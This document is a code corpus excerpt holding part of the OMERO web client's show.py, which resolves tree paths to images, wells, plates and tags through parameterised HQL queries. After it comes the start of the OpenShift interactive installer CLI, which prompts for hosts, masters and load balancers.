'and w.plate.id = :id', params, self.conn.SERVICE_OPTS
)
if object_type == 'acquisition':
db_row, = query_service.projection(
'select distinct w.id from Well as w '
'join w.wellSamples as ws '
'where w.row = :row and w.column = :column '
'and ws.plateAcquisition.id = :id',
params, self.conn.SERVICE_OPTS
)
well_id, = db_row
return self.conn.getObject(
'Well', well_id.val
)
def _load_first_selected(self, first_obj, attributes):
"""
Loads the first selected object from the server. Will raise
L{IncorrectMenuError} if the initialized menu was incorrect for
the loaded objects.
@param first_obj Type of the first selected object.
@type first_obj String
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
first_selected = None
if first_obj in ["tag", "tagset"]:
first_selected = self._load_tag(attributes)
elif first_obj == "well":
first_selected = self._load_well(attributes)
else:
# All other objects can be loaded by type and attributes.
first_selected, = self.conn.getObjects(
first_obj, attributes=attributes
)
if first_obj == "well":
# Wells aren't in the tree, so we need to look up the parent
well_sample = first_selected.getWellSample()
parent_node = None
parent_type = None
# It's possible that the Well that we've been requested to show
# has no fields (WellSample instances). In that case the Plate
# will be used but we don't have much choice.
if well_sample is not None:
parent_node = well_sample.getPlateAcquisition()
parent_type = "acquisition"
if parent_node is None:
# No WellSample for this well, try and retrieve the
# PlateAcquisition from the parent Plate.
plate = first_selected.getParent()
try:
parent_node, = plate.listPlateAcquisitions()
parent_type = "acquisition"
except ValueError:
# No PlateAcquisition for this well, use Plate instead
parent_node = plate
parent_type = "plate"
# Tree hierarchy open to first selected "real" object available
# in the tree.
self._initially_open = [
"%s-%s" % (parent_type, parent_node.getId()),
"%s-%s" % (first_obj, first_selected.getId())
]
first_selected = parent_node
else:
# Tree hierarchy open to first selected object.
self._initially_open = [
'%s-%s' % (first_obj, first_selected.getId())
]
# support for multiple objects selected by ID,
# E.g. show=image-1|image-2
if 'id' in attributes.keys() and len(self._initially_select) > 1:
# 'image.id-1' -> 'image-1'
self._initially_select = [
i.replace(".id", "") for i in self._initially_select]
else:
# Only select a single object
self._initially_select = self._initially_open[:]
self._initially_open_owner = first_selected.details.owner.id.val
return first_selected
def _find_first_selected(self):
"""Finds the first selected object."""
if len(self._initially_select) == 0:
return None
# tree hierarchy open to first selected object
m = self.PATH_REGEX.match(self._initially_select[0])
if m is None:
return None
first_obj = m.group('object_type')
# if we're showing a tag, make sure we're on the tags page...
if first_obj in ["tag", "tagset"] and self.menu != "usertags":
# redirect to usertags/?show=tag-123
raise IncorrectMenuError(
reverse(viewname="load_template", args=['usertags']) +
"?show=" + self._initially_select[0].replace(".id", "")
)
first_selected = None
try:
key = m.group('key')
value = m.group('value')
if key == 'id':
value = long(value)
attributes = {key: value}
# Set context to 'cross-group'
self.conn.SERVICE_OPTS.setOmeroGroup('-1')
first_selected = self._load_first_selected(first_obj, attributes)
except:
pass
if first_obj not in self.TOP_LEVEL_PREFIXES:
# Need to see if first item has parents
if first_selected is not None:
for p in first_selected.getAncestry():
                    # If 'Well' is a parent, we have started with Image.
# We want to start again at 'Well' to _load_first_selected
# with well, so we get 'acquisition' in ancestors.
if p.OMERO_CLASS == "Well":
self._initially_select = ['well.id-%s' % p.getId()]
return self._find_first_selected()
if first_obj == "tag":
# Parents of tags must be tagset (no OMERO_CLASS)
self._initially_open.insert(0, "tagset-%s" % p.getId())
else:
self._initially_open.insert(
0, "%s-%s" % (p.OMERO_CLASS.lower(), p.getId())
)
self._initially_open_owner = p.details.owner.id.val
m = self.PATH_REGEX.match(self._initially_open[0])
if m.group('object_type') == 'image':
self._initially_open.insert(0, "orphaned-0")
return first_selected
@property
def first_selected(self):
"""
Retrieves the first selected object. The first time this method is
invoked on the instance the actual retrieval is performed. All other
invocations retrieve the same instance without server interaction.
Will raise L{IncorrectMenuError} if the initialized menu was
incorrect for the loaded objects.
"""
if self._first_selected is None:
self._first_selected = self._find_first_selected()
return self._first_selected
@property
def initially_select(self):
"""
Retrieves the list of "paths" ("type-id") we have been requested to
show/select in the user interface. May be different than we were
first initialised with due to certain nodes of the Screen-Plate-Well
        hierarchy not being present in the tree. Should not be invoked until
after first retrieval of the L{Show.first_selected} property.
"""
return self._initially_select
@property
def initially_open(self):
"""
Retrieves the nodes of the tree that will be initially open based on
the nodes that are initially selected. Should not be invoked until
after first retrieval of the L{Show.first_selected} property.
"""
return self._initially_open
@property
def initially_open_owner(self):
"""
Retrieves the owner of the node closest to the root of the tree from
the list of initially open nodes. Should not be invoked until
after first retrieval of the L{Show.first_selected} property.
"""
return self._initially_open_owner
def get_image_ids(conn, datasetId=None, groupId=-1, ownerId=None):
"""
Retrieves a list of all image IDs in a Dataset or Orphaned
(with owner specified by ownerId). The groupId can be specified
    as needed, particularly when querying orphaned images.
"""
qs = conn.getQueryService()
p = omero.sys.ParametersI()
so = deepcopy(conn.SERVICE_OPTS)
so.setOmeroGroup(groupId)
if datasetId is not None:
p.add('did', rlong(datasetId))
q = """select image.id from Image image
join image.datasetLinks dlink where dlink.parent.id = :did
order by lower(image.name), image.id"""
else:
p.add('ownerId', rlong(ownerId))
q = """select image.id from Image image where
image.details.owner.id = :ownerId and
not exists (
select dilink from DatasetImageLink as dilink
where dilink.child = image.id
) and
not exists (
select ws from WellSample ws
where ws.image.id = image.id
)
order by lower(image.name), image.id"""
iids = [i[0].val for i in qs.projection(q, p, so)]
return iids
def paths_to_object(conn, experimenter_id=None, project_id=None,
dataset_id=None, image_id=None, screen_id=None,
plate_id=None, acquisition_id=None, well_id=None,
group_id=None, page_size=None):
"""
Retrieves the parents of an object (E.g. P/D/I for image) as a list
of paths.
Lowest object in hierarchy is found by checking parameter ids in order:
image->dataset->project->well->acquisition->plate->screen->experimenter
If object has multiple paths, these can also be filtered by parent_ids.
E.g. paths to image_id filtered by dataset_id.
If image is in a Dataset or Orphaned collection that is paginated
(imageCount > page_size) then we include 'childPage', 'childCount'
and 'childIndex' in the dataset or orphaned dict.
The page_size default is settings.PAGE (omero.web.page_size)
Note on wells:
    Selecting a 'well' really means selecting its well_sample paths;
    if a well is specified on its own, we return all the well_sample paths
    that match.
"""
qs = conn.getQueryService()
if page_size is None:
page_size = settings.PAGE
params = omero.sys.ParametersI()
service_opts = deepcopy(conn.SERVICE_OPTS)
lowest_type = None
if experimenter_id is not None:
params.add('eid', rlong(experimenter_id))
lowest_type = 'experimenter'
if screen_id is not None:
params.add('sid', rlong(screen_id))
lowest_type = 'screen'
if plate_id is not None:
params.add('plid', rlong(plate_id))
lowest_type = 'plate'
if acquisition_id is not None:
params.add('aid', rlong(acquisition_id))
lowest_type = 'acquisition'
if well_id is not None:
params.add('wid', rlong(well_id))
lowest_type = 'well'
if project_id is not None:
params.add('pid', rlong(project_id))
lowest_type = 'project'
if dataset_id is not None:
params.add('did', rlong(dataset_id))
lowest_type = 'dataset'
if image_id is not None:
params.add('iid', rlong(image_id))
lowest_type = 'image'
# If none of these parameters are set then there is nothing to find
if lowest_type is None:
return []
if group_id is not None:
service_opts.setOmeroGroup(group_id)
# Hierarchies for this object
paths = []
# It is probably possible to write a more generic query instead
# of special casing each type, but it will be less readable and
# maintainable than these
if lowest_type == 'image':
q = '''
select coalesce(powner.id, downer.id, iowner.id),
pdlink.parent.id,
dilink.parent.id,
(select count(id) from DatasetImageLink dil
where dil.parent=dilink.parent.id),
image.id,
image.details.group.id as groupId
from Image image
join image.details.owner iowner
left outer join image.datasetLinks dilink
left outer join dilink.parent.details.owner downer
left outer join dilink.parent.projectLinks pdlink
left outer join pdlink.parent.details.owner powner
where image.id = :iid
'''
where_clause = []
if dataset_id is not None:
where_clause.append('dilink.parent.id = :did')
if project_id is not None:
where_clause.append('pdlink.parent.id = :pid')
if experimenter_id is not None:
where_clause.append(
'coalesce(powner.id, downer.id, iowner.id) = :eid')
if len(where_clause) > 0:
q += ' and ' + ' and '.join(where_clause)
q += '''
order by coalesce(powner.id, downer.id, iowner.id),
pdlink.parent.id,
dilink.parent.id,
image.id
'''
for e in qs.projection(q, params, service_opts):
path = []
imageId = e[4].val
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->project->dataset->image
if e[1] is not None:
path.append({
'type': 'project',
'id': e[1].val
})
# If it is experimenter->dataset->image or
# experimenter->project->dataset->image
if e[2] is not None:
imgCount = e[3].val
datasetId = e[2].val
ds = {
'type': 'dataset',
'id': datasetId,
'childCount': imgCount,
}
if imgCount > page_size:
# Need to know which page image is on
iids = get_image_ids(conn, datasetId)
index = iids.index(imageId)
page = (index / page_size) + 1 # 1-based index
ds['childIndex'] = index
ds['childPage'] = page
path.append(ds)
# If it is orphaned->image
paths_to_img = []
if e[2] is None:
# Check if image is in Well
paths_to_img = paths_to_well_image(
conn, params,
well_id=well_id, image_id=image_id,
acquisition_id=acquisition_id,
plate_id=plate_id,
screen_id=screen_id,
experimenter_id=experimenter_id,
orphanedImage=True)
if len(paths_to_img) == 0:
orph = {
'type': 'orphaned',
'id': e[0].val
}
iids = get_image_ids(conn, groupId=e[5].val,
ownerId=e[0].val)
if len(iids) > page_size:
try:
index = iids.index(imageId)
page = (index / page_size) + 1 # 1-based index
orph['childCount'] = len(iids)
orph['childIndex'] = index
orph['childPage'] = page
except ValueError:
# If image is in Well, it won't be in orphaned list
pass
path.append(orph)
if len(paths_to_img) > 0:
paths = paths_to_img
else:
# Image always present
path.append({
'type': 'image',
'id': imageId
})
paths.append(path)
elif lowest_type == 'dataset':
q = '''
select coalesce(powner.id, downer.id),
pdlink.parent.id,
dataset.id
from Dataset dataset
join dataset.details.owner downer
left outer join dataset.projectLinks pdlink
left outer join pdlink.parent.details.owner powner
where dataset.id = :did
'''
where_clause = []
if project_id is not None:
where_clause.append('pdlink.parent.id = :pid')
if experimenter_id is not None:
where_clause.append('coalesce(powner.id, downer.id) = :eid')
if len(where_clause) > 0:
q += ' and ' + ' and '.join(where_clause)
for e in qs.projection(q, params, service_opts):
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->project->dataset
if e[1] is not None:
path.append({
'type': 'project',
'id': e[1].val
})
# Dataset always present
path.append({
'type': 'dataset',
'id': e[2].val
})
paths.append(path)
elif lowest_type == 'project':
q = '''
select project.details.owner.id,
project.id
from Project project
where project.id = :pid
'''
for e in qs.projection(q, params, service_opts):
path = []
# Always experimenter->project
path.append({
'type': 'experimenter',
'id': e[0].val
})
path.append({
'type': 'project',
'id': e[1].val
})
paths.append(path)
# This is basically the same as WellSample except that it is not
# restricted by a particular WellSample id
# May not have acquisition (load plate from well)
# We don't need to load the wellsample (not in tree)
elif lowest_type == 'well':
paths_to_img = paths_to_well_image(conn, params,
well_id=well_id,
image_id=image_id,
acquisition_id=acquisition_id,
plate_id=plate_id,
screen_id=screen_id,
experimenter_id=experimenter_id)
if len(paths_to_img) > 0:
paths.extend(paths_to_img)
elif lowest_type == 'acquisition':
q = '''
select coalesce(sowner.id, plowner.id, aowner.id),
slink.parent.id,
plate.id,
acquisition.id
from PlateAcquisition acquisition
join acquisition.details.owner aowner
left outer join acquisition.plate plate
left outer join plate.details.owner plowner
left outer join plate.screenLinks slink
left outer join slink.parent.details.owner sowner
where acquisition.id = :aid
'''
where_clause = []
if plate_id is not None:
where_clause.append('plate.id = :plid')
if screen_id is not None:
where_clause.append('slink.parent.id = :sid')
if experimenter_id is not None:
where_clause.append(
'coalesce(sowner.id, plowner.id, aowner.id) = :eid')
if len(where_clause) > 0:
q += ' and ' + ' and '.join(where_clause)
for e in qs.projection(q, params, service_opts):
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->screen->plate->acquisition
if e[1] is not None:
path.append({
'type': 'screen',
'id': e[1].val
})
# If it is experimenter->plate->acquisition or
# experimenter->screen->plate->acquisition
if e[2] is not None:
path.append({
'type': 'plate',
'id': e[2].val
})
# Acquisition always present
path.append({
'type': 'acquisition',
'id': e[3].val
})
paths.append(path)
elif lowest_type == 'plate':
q = '''
select coalesce(sowner.id, plowner.id),
splink.parent.id,
plate.id
from Plate plate
            join plate.details.owner plowner
            left outer join plate.screenLinks splink
            left outer join splink.parent.details.owner sowner
where plate.id = :plid
'''
where_clause = []
if screen_id is not None:
where_clause.append('splink.parent.id = :sid')
if experimenter_id is not None:
where_clause.append('coalesce(sowner.id, plowner.id) = :eid')
if len(where_clause) > 0:
q += ' and ' + ' and '.join(where_clause)
for e in qs.projection(q, params, service_opts):
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->screen->plate
if e[1] is not None:
path.append({
'type': 'screen',
'id': e[1].val
})
# Plate always present
path.append({
'type': 'plate',
'id': e[2].val
})
paths.append(path)
elif lowest_type == 'screen':
q = '''
select screen.details.owner.id,
screen.id
from Screen screen
where screen.id = :sid
'''
for e in qs.projection(q, params, service_opts):
path = []
# Always experimenter->screen
path.append({
'type': 'experimenter',
'id': e[0].val
})
path.append({
'type': 'screen',
'id': e[1].val
})
paths.append(path)
elif lowest_type == 'experimenter':
path = []
# No query required here as this is the highest level container
path.append({
'type': 'experimenter',
'id': experimenter_id
})
paths.append(path)
return paths
def paths_to_well_image(conn, params, well_id=None, image_id=None,
acquisition_id=None,
plate_id=None, screen_id=None, experimenter_id=None,
orphanedImage=False):
qs = conn.getQueryService()
service_opts = deepcopy(conn.SERVICE_OPTS)
q = '''
select coalesce(sowner.id, plowner.id, aowner.id, wsowner.id),
slink.parent.id,
plate.id,
acquisition.id,
well.id
from WellSample wellsample
join wellsample.details.owner wsowner
left outer join wellsample.plateAcquisition acquisition
left outer join acquisition.details.owner aowner
join wellsample.well well
join well.plate plate
join plate.details.owner plowner
left outer join plate.screenLinks slink
left outer join slink.parent.details.owner sowner
'''
where_clause = []
if well_id is not None:
where_clause.append('wellsample.well.id = :wid')
if image_id is not None:
where_clause.append('wellsample.image.id = :iid')
if acquisition_id is not None:
where_clause.append('acquisition.id = :aid')
if plate_id is not None:
where_clause.append('plate.id = :plid')
if screen_id is not None:
where_clause.append('slink.parent.id = :sid')
if experimenter_id is not None:
where_clause.append(
            'coalesce(sowner.id, plowner.id, aowner.id, wsowner.id) = :eid')
if len(where_clause) > 0:
q += 'where ' + ' and '.join(where_clause)
paths = []
for e in qs.projection(q, params, service_opts):
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->screen->plate->acquisition->wellsample
if e[1] is not None:
path.append({
'type': 'screen',
'id': e[1].val
})
        # Plate should always be present
path.append({
'type': 'plate',
'id': e[2].val
})
# Acquisition not present if plate created via API (not imported)
if e[3] is not None:
path.append({
'type': 'acquisition',
'id': e[3].val
})
# Include Well if path is to image
if e[4] is not None and orphanedImage:
path.append({
'type': 'well',
'id': e[4].val
})
paths.append(path)
return paths
def paths_to_tag(conn, experimenter_id=None, tagset_id=None, tag_id=None):
"""
Finds tag for tag_id, also looks for parent tagset in path.
If tag_id and tagset_id are given, only return paths that have both.
If no tagset/tag paths are found, simply look for tags with tag_id.
"""
params = omero.sys.ParametersI()
service_opts = deepcopy(conn.SERVICE_OPTS)
where_clause = []
if experimenter_id is not None:
params.add('eid', rlong(experimenter_id))
where_clause.append(
'coalesce(tsowner.id, towner.id) = :eid')
if tag_id is not None:
params.add('tid', rlong(tag_id))
where_clause.append(
'ttlink.child.id = :tid')
if tagset_id is not None:
params.add('tsid', rlong(tagset_id))
where_clause.append(
'tagset.id = :tsid')
if tag_id is None and tagset_id is None:
return []
qs = conn.getQueryService()
paths = []
# Look for tag in a tagset...
if tag_id is not None:
q = '''
select coalesce(tsowner.id, towner.id),
tagset.id,
ttlink.child.id
from TagAnnotation tagset
join tagset.details.owner tsowner
left outer join tagset.annotationLinks ttlink
left outer join ttlink.child.details.owner towner
where %s
''' % ' and '.join(where_clause)
tagsets = qs.projection(q, params, service_opts)
for e in tagsets:
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
path.append({
'type': 'tagset',
'id': e[1].val
})
path.append({
'type': 'tag',
'id': e[2].val
})
paths.append(path)
# If we haven't found tag in tagset, just look for tags with matching IDs
if len(paths) == 0:
where_clause = []
if experimenter_id is not None:
# params.add('eid', rlong(experimenter_id))
where_clause.append(
'coalesce(tsowner.id, towner.id) = :eid')
if tag_id is not None:
# params.add('tid', rlong(tag_id))
where_clause.append(
'tag.id = :tid')
elif tagset_id is not None:
# params.add('tsid', rlong(tagset_id))
where_clause.append(
'tag.id = :tsid')
q = '''
select towner.id, tag.id
from TagAnnotation tag
left outer join tag.details.owner towner
where %s
''' % ' and '.join(where_clause)
tagsets = qs.projection(q, params, service_opts)
for e in tagsets:
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
if tag_id is not None:
t = 'tag'
else:
t = 'tagset'
path.append({
'type': t,
'id': e[1].val
})
paths.append(path)
return paths
|
simleo/openmicroscopy
|
components/tools/OmeroWeb/omeroweb/webclient/show.py
|
Python
|
gpl-2.0
| 37,362 | 0.00008 |
# TODO: Temporarily disabled due to importing old code into openshift-ansible
# repo. We will work on these over time.
# pylint: disable=bad-continuation,missing-docstring,no-self-use,invalid-name,no-value-for-parameter
import click
import os
import re
import sys
from ooinstall import openshift_ansible
from ooinstall import OOConfig
from ooinstall.oo_config import OOConfigInvalidHostError
from ooinstall.oo_config import Host
from ooinstall.variants import find_variant, get_variant_version_combos
DEFAULT_ANSIBLE_CONFIG = '/usr/share/atomic-openshift-utils/ansible.cfg'
DEFAULT_PLAYBOOK_DIR = '/usr/share/ansible/openshift-ansible/'
def validate_ansible_dir(path):
if not path:
raise click.BadParameter('An ansible path must be provided')
return path
# if not os.path.exists(path)):
# raise click.BadParameter("Path \"{}\" doesn't exist".format(path))
def is_valid_hostname(hostname):
if not hostname or len(hostname) > 255:
return False
if hostname[-1] == ".":
hostname = hostname[:-1] # strip exactly one dot from the right, if present
allowed = re.compile(r"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
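# Illustrative behaviour of is_valid_hostname (examples added for clarity):
#     is_valid_hostname("master1.example.com")  -> True
#     is_valid_hostname("bad_host")             -> False (underscores are not allowed)
#     is_valid_hostname("")                     -> False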
def validate_prompt_hostname(hostname):
if '' == hostname or is_valid_hostname(hostname):
return hostname
raise click.BadParameter('"{}" appears to be an invalid hostname. ' \
                             'Please double-check this value ' \
'and re-enter it.'.format(hostname))
def get_ansible_ssh_user():
click.clear()
message = """
This installation process will involve connecting to remote hosts via ssh. Any
account may be used; however, if a non-root account is used it must have
passwordless sudo access.
"""
click.echo(message)
return click.prompt('User for ssh access', default='root')
def list_hosts(hosts):
hosts_idx = range(len(hosts))
for idx in hosts_idx:
click.echo(' {}: {}'.format(idx, hosts[idx]))
def delete_hosts(hosts):
while True:
list_hosts(hosts)
del_idx = click.prompt('Select host to delete, y/Y to confirm, ' \
'or n/N to add more hosts', default='n')
try:
del_idx = int(del_idx)
hosts.remove(hosts[del_idx])
except IndexError:
click.echo("\"{}\" doesn't match any hosts listed.".format(del_idx))
except ValueError:
try:
response = del_idx.lower()
if response in ['y', 'n']:
return hosts, response
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
except AttributeError:
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
return hosts, None
def collect_hosts(version=None, masters_set=False, print_summary=True):
"""
Collect host information from user. This will later be filled in using
ansible.
Returns: a list of host information collected from the user
"""
click.clear()
click.echo('*** Host Configuration ***')
message = """
You must now specify the hosts that will compose your OpenShift cluster.
Please enter an IP or hostname to connect to for each system in the cluster.
You will then be prompted to identify what role you would like this system to
serve in the cluster.
OpenShift Masters serve the API and web console and coordinate the jobs to run
across the environment. If desired you can specify multiple Master systems for
an HA deployment, in which case you will be prompted to identify a *separate*
system to act as the load balancer for your cluster after all Masters and Nodes
are defined.
If only one Master is specified, an etcd instance embedded within the OpenShift
Master service will be used as the datastore. This can be later replaced with a
separate etcd instance if desired. If multiple Masters are specified, a
separate etcd cluster will be configured with each Master serving as a member.
Any Masters configured as part of this installation process will also be
configured as Nodes. This is so that the Master will be able to proxy to Pods
from the API. By default this Node will be unschedulable but this can be changed
after installation with 'oadm manage-node'.
OpenShift Nodes provide the runtime environments for containers. They will
host the required services to be managed by the Master.
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#master
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#node
"""
click.echo(message)
hosts = []
more_hosts = True
num_masters = 0
while more_hosts:
host_props = {}
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_hostname)
if not masters_set:
if click.confirm('Will this host be an OpenShift Master?'):
host_props['master'] = True
num_masters += 1
if version == '3.0':
masters_set = True
host_props['node'] = True
#TODO: Reenable this option once container installs are out of tech preview
#rpm_or_container = click.prompt('Will this host be RPM or Container based (rpm/container)?',
# type=click.Choice(['rpm', 'container']),
# default='rpm')
#if rpm_or_container == 'container':
# host_props['containerized'] = True
#else:
# host_props['containerized'] = False
host_props['containerized'] = False
host = Host(**host_props)
hosts.append(host)
if print_summary:
print_installation_summary(hosts)
# If we have one master, this is enough for an all-in-one deployment,
# thus we can start asking if you wish to proceed. Otherwise we assume
# you must.
if masters_set or num_masters != 2:
more_hosts = click.confirm('Do you want to add additional hosts?')
if num_masters >= 3:
collect_master_lb(hosts)
return hosts
def print_installation_summary(hosts):
"""
Displays a summary of all hosts configured thus far, and what role each
will play.
Shows total nodes/masters, hints for performing/modifying the deployment
with additional setup, warnings for invalid or sub-optimal configurations.
"""
click.clear()
click.echo('*** Installation Summary ***\n')
click.echo('Hosts:')
for host in hosts:
print_host_summary(hosts, host)
masters = [host for host in hosts if host.master]
nodes = [host for host in hosts if host.node]
dedicated_nodes = [host for host in hosts if host.node and not host.master]
click.echo('')
click.echo('Total OpenShift Masters: %s' % len(masters))
click.echo('Total OpenShift Nodes: %s' % len(nodes))
if len(masters) == 1:
ha_hint_message = """
NOTE: Add a total of 3 or more Masters to perform an HA installation."""
click.echo(ha_hint_message)
elif len(masters) == 2:
min_masters_message = """
WARNING: A minimum of 3 masters are required to perform an HA installation.
Please add one more to proceed."""
click.echo(min_masters_message)
elif len(masters) >= 3:
ha_message = """
NOTE: Multiple Masters specified, this will be an HA deployment with a separate
etcd cluster. You will be prompted to provide the FQDN of a load balancer once
finished entering hosts."""
click.echo(ha_message)
dedicated_nodes_message = """
WARNING: Dedicated Nodes are recommended for an HA deployment. If no dedicated
Nodes are specified, each configured Master will be marked as a schedulable
Node."""
min_ha_nodes_message = """
WARNING: A minimum of 3 dedicated Nodes are recommended for an HA
deployment."""
if len(dedicated_nodes) == 0:
click.echo(dedicated_nodes_message)
elif len(dedicated_nodes) < 3:
click.echo(min_ha_nodes_message)
click.echo('')
def print_host_summary(all_hosts, host):
click.echo("- %s" % host.connect_to)
if host.master:
click.echo(" - OpenShift Master")
if host.node:
if host.is_dedicated_node():
click.echo(" - OpenShift Node (Dedicated)")
elif host.is_schedulable_node(all_hosts):
click.echo(" - OpenShift Node")
else:
click.echo(" - OpenShift Node (Unscheduled)")
if host.master_lb:
if host.preconfigured:
click.echo(" - Load Balancer (Preconfigured)")
else:
click.echo(" - Load Balancer (HAProxy)")
if host.master:
if host.is_etcd_member(all_hosts):
click.echo(" - Etcd Member")
else:
click.echo(" - Etcd (Embedded)")
def collect_master_lb(hosts):
"""
Get a valid load balancer from the user and append it to the list of
hosts.
Ensure user does not specify a system already used as a master/node as
this is an invalid configuration.
"""
message = """
Setting up High Availability Masters requires a load balancing solution.
Please provide the FQDN of a host that will be configured as a proxy. This
can be either an existing load balancer configured to balance all masters on
port 8443 or a new host that will have HAProxy installed on it.
If the host provided is not yet configured, a reference haproxy load
balancer will be installed. It's important to note that while the rest of the
environment will be fault tolerant, this reference load balancer will not be.
It can be replaced post-installation with a load balancer with the same
hostname.
"""
click.echo(message)
host_props = {}
# Using an embedded function here so we have access to the hosts list:
def validate_prompt_lb(hostname):
# Run the standard hostname check first:
hostname = validate_prompt_hostname(hostname)
# Make sure this host wasn't already specified:
for host in hosts:
if host.connect_to == hostname and (host.master or host.node):
raise click.BadParameter('Cannot re-use "%s" as a load balancer, '
'please specify a separate host' % hostname)
return hostname
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_lb)
install_haproxy = click.confirm('Should the reference haproxy load balancer be installed on this host?')
host_props['preconfigured'] = not install_haproxy
host_props['master'] = False
host_props['node'] = False
host_props['master_lb'] = True
master_lb = Host(**host_props)
hosts.append(master_lb)
def confirm_hosts_facts(oo_cfg, callback_facts):
hosts = oo_cfg.hosts
click.clear()
message = """
A list of the facts gathered from the provided hosts follows. Because it is
often the case that the hostname for a system inside the cluster is different
from the hostname that is resolvable from the command line or web clients,
these settings cannot be validated automatically.
For some cloud providers the installer is able to gather metadata exposed in
the instance so reasonable defaults will be provided.
Please confirm that they are correct before moving forward.
"""
notes = """
Format:
connect_to,IP,public IP,hostname,public hostname
Notes:
* The installation host is the hostname from the installer's perspective.
* The IP of the host should be the internal IP of the instance.
* The public IP should be the externally accessible IP associated with the instance.
* The hostname should resolve to the internal IP from the instances
themselves.
* The public hostname should resolve to the external IP from hosts outside of
the cloud.
"""
# For testing purposes we need to click.echo only once, so build up
# the message:
output = message
default_facts_lines = []
default_facts = {}
for h in hosts:
if h.preconfigured == True:
continue
default_facts[h.connect_to] = {}
h.ip = callback_facts[h.connect_to]["common"]["ip"]
h.public_ip = callback_facts[h.connect_to]["common"]["public_ip"]
h.hostname = callback_facts[h.connect_to]["common"]["hostname"]
h.public_hostname = callback_facts[h.connect_to]["common"]["public_hostname"]
default_facts_lines.append(",".join([h.connect_to,
h.ip,
h.public_ip,
h.hostname,
h.public_hostname]))
output = "%s\n%s" % (output, ",".join([h.connect_to,
h.ip,
h.public_ip,
h.hostname,
h.public_hostname]))
output = "%s\n%s" % (output, notes)
click.echo(output)
facts_confirmed = click.confirm("Do the above facts look correct?")
if not facts_confirmed:
message = """
Edit %s with the desired values and run `atomic-openshift-installer --unattended install` to restart the install.
""" % oo_cfg.config_path
click.echo(message)
# Make sure we actually write out the config file.
oo_cfg.save_to_disk()
sys.exit(0)
return default_facts
def check_hosts_config(oo_cfg, unattended):
click.clear()
masters = [host for host in oo_cfg.hosts if host.master]
if len(masters) == 2:
click.echo("A minimum of 3 Masters are required for HA deployments.")
sys.exit(1)
if len(masters) > 1:
master_lb = [host for host in oo_cfg.hosts if host.master_lb]
if len(master_lb) > 1:
click.echo('ERROR: More than one Master load balancer specified. Only one is allowed.')
sys.exit(1)
elif len(master_lb) == 1:
if master_lb[0].master or master_lb[0].node:
click.echo('ERROR: The Master load balancer is configured as a master or node. Please correct this.')
sys.exit(1)
else:
message = """
ERROR: No master load balancer specified in config. You must provide the FQDN
of a load balancer to balance the API (port 8443) on all Master hosts.
https://docs.openshift.org/latest/install_config/install/advanced_install.html#multiple-masters
"""
click.echo(message)
sys.exit(1)
dedicated_nodes = [host for host in oo_cfg.hosts if host.node and not host.master]
if len(dedicated_nodes) == 0:
message = """
WARNING: No dedicated Nodes specified. By default, colocated Masters have
their Nodes set to unschedulable. If you proceed, all nodes will be labelled
as schedulable.
"""
if unattended:
click.echo(message)
else:
confirm_continue(message)
return
def get_variant_and_version(multi_master=False):
message = "\nWhich variant would you like to install?\n\n"
i = 1
combos = get_variant_version_combos()
for (variant, version) in combos:
message = "%s\n(%s) %s %s" % (message, i, variant.description,
version.name)
i = i + 1
message = "%s\n" % message
click.echo(message)
if multi_master:
        click.echo('NOTE: 3.0 installations are not supported for multiple Masters (HA).')
response = click.prompt("Choose a variant from above: ", default=1)
product, version = combos[response - 1]
return product, version
def confirm_continue(message):
if message:
click.echo(message)
click.confirm("Are you ready to continue?", default=False, abort=True)
return
def error_if_missing_info(oo_cfg):
missing_info = False
if not oo_cfg.hosts:
missing_info = True
click.echo('For unattended installs, hosts must be specified on the '
'command line or in the config file: %s' % oo_cfg.config_path)
sys.exit(1)
if 'ansible_ssh_user' not in oo_cfg.settings:
click.echo("Must specify ansible_ssh_user in configuration file.")
sys.exit(1)
# Lookup a variant based on the key we were given:
if not oo_cfg.settings['variant']:
click.echo("No variant specified in configuration file.")
sys.exit(1)
ver = None
if 'variant_version' in oo_cfg.settings:
ver = oo_cfg.settings['variant_version']
variant, version = find_variant(oo_cfg.settings['variant'], version=ver)
if variant is None or version is None:
err_variant_name = oo_cfg.settings['variant']
if ver:
err_variant_name = "%s %s" % (err_variant_name, ver)
click.echo("%s is not an installable variant." % err_variant_name)
sys.exit(1)
oo_cfg.settings['variant_version'] = version.name
missing_facts = oo_cfg.calc_missing_facts()
if len(missing_facts) > 0:
missing_info = True
click.echo('For unattended installs, facts must be provided for all masters/nodes:')
for host in missing_facts:
click.echo('Host "%s" missing facts: %s' % (host, ", ".join(missing_facts[host])))
if missing_info:
sys.exit(1)
def get_missing_info_from_user(oo_cfg):
""" Prompts the user for any information missing from the given configuration. """
click.clear()
message = """
Welcome to the OpenShift Enterprise 3 installation.
Please confirm that following prerequisites have been met:
* All systems where OpenShift will be installed are running Red Hat Enterprise
Linux 7.
* All systems are properly subscribed to the required OpenShift Enterprise 3
repositories.
* All systems have run docker-storage-setup (part of the Red Hat docker RPM).
* All systems have working DNS that resolves not only from the perspective of
the installer but also from within the cluster.
When the process completes you will have a default configuration for Masters
and Nodes. For ongoing environment maintenance it's recommended that the
official Ansible playbooks be used.
For more information on installation prerequisites please see:
https://docs.openshift.com/enterprise/latest/admin_guide/install/prerequisites.html
"""
confirm_continue(message)
click.clear()
if oo_cfg.settings.get('ansible_ssh_user', '') == '':
oo_cfg.settings['ansible_ssh_user'] = get_ansible_ssh_user()
click.clear()
